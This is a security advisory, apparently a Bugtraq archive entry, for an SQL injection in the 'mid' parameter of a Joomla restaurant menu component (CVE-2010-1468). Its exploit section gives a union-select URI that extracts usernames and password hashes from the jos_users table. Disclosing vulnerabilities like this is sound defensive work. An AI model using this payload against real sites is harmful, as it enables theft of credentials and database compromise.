Multi-Venue Restaurant Menu Manager Joomla! Component 'mid' Parameter SQL Injection Vulnerability
BID:39382
CVE-2010-1468 |Info
Multi-Venue Restaurant Menu Manager Joomla! Component 'mid' Parameter SQL Injection Vulnerability
| Bugtraq ID: | 39382 |
| Class: | Input Validation Error |
| CVE: |
CVE-2010-1468 |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 11 2010 12:00AM |
| Updated: | Apr 13 2015 09:02PM |
| Credit: | Valentin Hoebel |
| Vulnerable: |
Focusplus Developments Multi-Venue Restaurant Menu Manager 1.5.2 Stable Update 3 |
| Not Vulnerable: |
Focusplus Developments Multi-Venue Restaurant Menu Manager 1.5.2 Update 4 |
Discussion
Multi-Venue Restaurant Menu Manager Joomla! Component 'mid' Parameter SQL Injection Vulnerability
The Multi-Venue Restaurant Menu Manager component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Focusplus Developments Multi-Venue Restaurant Menu Manager 1.5.2 Stable Update 3 and prior are vulnerable.
The Multi-Venue Restaurant Menu Manager component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Focusplus Developments Multi-Venue Restaurant Menu Manager 1.5.2 Stable Update 3 and prior are vulnerable.
Exploit / POC
Multi-Venue Restaurant Menu Manager Joomla! Component 'mid' Parameter SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
Then following example URI is available:
http://www.example.com/joomla/index.php?option=com_mv_restaurantmenumanager&task=menu_display&Venue=1&mid=5+and+1=2+union+select+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12+from+jos_users<http://www.example.com/joomla/index.php?option=com_mv_restaurantmenumanager&task=menu_display&Venue=1&mid=5+and+1=2+union+select+1,2,group_concat%28username,0x3a,password%29,4,5,6,7,8,9,10,11,12+from+jos_users>
Attackers can use a browser to exploit this issue.
Then following example URI is available:
http://www.example.com/joomla/index.php?option=com_mv_restaurantmenumanager&task=menu_display&Venue=1&mid=5+and+1=2+union+select+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12+from+jos_users<http://www.example.com/joomla/index.php?option=com_mv_restaurantmenumanager&task=menu_display&Venue=1&mid=5+and+1=2+union+select+1,2,group_concat%28username,0x3a,password%29,4,5,6,7,8,9,10,11,12+from+jos_users>
Solution / Fix
Multi-Venue Restaurant Menu Manager Joomla! Component 'mid' Parameter SQL Injection Vulnerability
Solution:
Updates are available. Please see the references for more information.
Solution:
Updates are available. Please see the references for more information.
References
Multi-Venue Restaurant Menu Manager Joomla! Component 'mid' Parameter SQL Injection Vulnerability
References:
References:
- Joomla! Extension Homepage (Joomla!)
- Multi-Venue Restaurant Menu Manager Homepage (Focusplus Developments)